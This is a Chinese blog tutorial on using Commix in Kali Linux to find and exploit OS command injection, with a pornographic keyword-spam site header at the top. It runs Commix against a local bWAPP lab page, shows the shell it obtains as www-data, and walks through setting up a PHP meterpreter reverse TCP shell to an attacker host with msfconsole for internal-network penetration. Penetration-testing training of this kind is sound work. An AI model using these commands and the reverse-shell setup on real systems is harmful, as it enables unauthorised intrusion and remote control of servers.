日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > linux >内容正文

linux

shell 工具_Kali Linux渗透工具【八】:系统命令注入漏洞工具 – Commix使用

發布時間:2024/10/14 linux 28 豆豆
生活随笔 收集整理的這篇文章主要介紹了 shell 工具_Kali Linux渗透工具【八】:系统命令注入漏洞工具 – Commix使用 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

聲明:【Kali與編程】所有分享,僅做學習交流,切勿用于任何不法用途,否則后果自負!

一、Commix是什么?

Commix由Python編寫的一款工具,它是一個適用于web開發者、滲透測試人員及安全研究者的自動化測試工具,可以幫助他們更高效的發現web應用中的命令注入攻擊相關漏洞。在Kali Linux中自帶有Commix這款工具。

二、Commix補充介紹。

Commix是為了方便的檢測一個請求是否存在命令注入漏洞,并且對其進行測試,現在的最新版本中支持直接直接導入burp的歷史記錄進行檢測,大大提高了軟件的易用性和滲透的成功率,不得不說,它是IT人員的滲透利器!

三、Commix使用參數有哪些?

在Kali Linux中輸入commix –h獲取幫助信息!

四、Commix如何使用?

其中的特定信息如Cookie,可通過瀏覽器調試工具或第三方工具獲取!

~# commix --url "http://127.0.0.1/bWAPP/commandi.php" --cookie="acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada; PHPSESSID=mq78064h3p2b00n4toerk7ana1; security_level=0" --data="target=www.nsa.gov&form=submit"

詢問是否想要一個shell 輸入Y 的到shell

[?] Do you want a Pseudo-Terminal shell? [Y/n] > y

Pseudo-Terminal (type '?' for available options)

commix(os_shell) >

得到shell

commix(os_shell) > pwd

/owaspbwa/bwapp-git/bWAPP

commix(os_shell) > id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

commix(os_shell) > ls -ll

可以進行反彈shell 結合metasploit 進行內網滲透

commix(os_shell) > reverse_tcp

commix(reverse_tcp) > set LHOST 192.168.120.101 """(msf機器)

LHOST => 192.168.120.101

commix(reverse_tcp) > set LPORT 4444

LPORT => 4444

---[ Reverse TCP shells ]---

Type '1' to use a netcat reverse TCP shell.

Type '2' for other reverse TCP shells.

commix(reverse_tcp) > 2

---[ Unix-like reverse TCP shells ]---

Type '1' to use a PHP reverse TCP shell.

Type '2' to use a Perl reverse TCP shell.

Type '3' to use a Ruby reverse TCP shell.

Type '4' to use a Python reverse TCP shell.

Type '5' to use a Socat reverse TCP shell.

Type '6' to use a Bash reverse TCP shell.

Type '7' to use a Ncat reverse TCP shell.

---[ Meterpreter reverse TCP shells ]---

Type '8' to use a PHP meterpreter reverse TCP shell.

Type '9' to use a Python meterpreter reverse TCP shell.

Type '10' to use a Windows meterpreter reverse TCP shell.

Type '11' to use the web delivery script.

commix(reverse_tcp_other) > 8

[*] Generating the 'php/meterpreter/reverse_tcp' payload... [ SUCCEED ]

[*] Type "msfconsole -r /usr/share/commix/php_meterpreter.rc" (in a new window). #復制 啟動msf

[*] Once the loading is done, press here any key to continue... #按下確定鍵就可進行在msf接收到反彈的shell

[+] Everything is in place, cross your fingers and wait for a shell!

Commix使用總結如下:

1.瀏覽器訪問http://127.0.0.1 /bWAPP/commandi.php

2.提交數據 通過抓包工具截取 url cookie data數據

3.用commix 工具指定鏈接并進入后臺

commix -- url "http://127.0.0.1 /bWAPP/commandi.php" --data="target=www.nsa.gov&form=submit" --cookie "+++++++"

親愛的同學,我們將持續分享Kali與編程技巧,歡迎關注我們哦!

點擊了解更多,還有更多Kali與編程技巧,等你來學!

總結

以上是生活随笔為你收集整理的shell 工具_Kali Linux渗透工具【八】:系统命令注入漏洞工具 – Commix使用的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。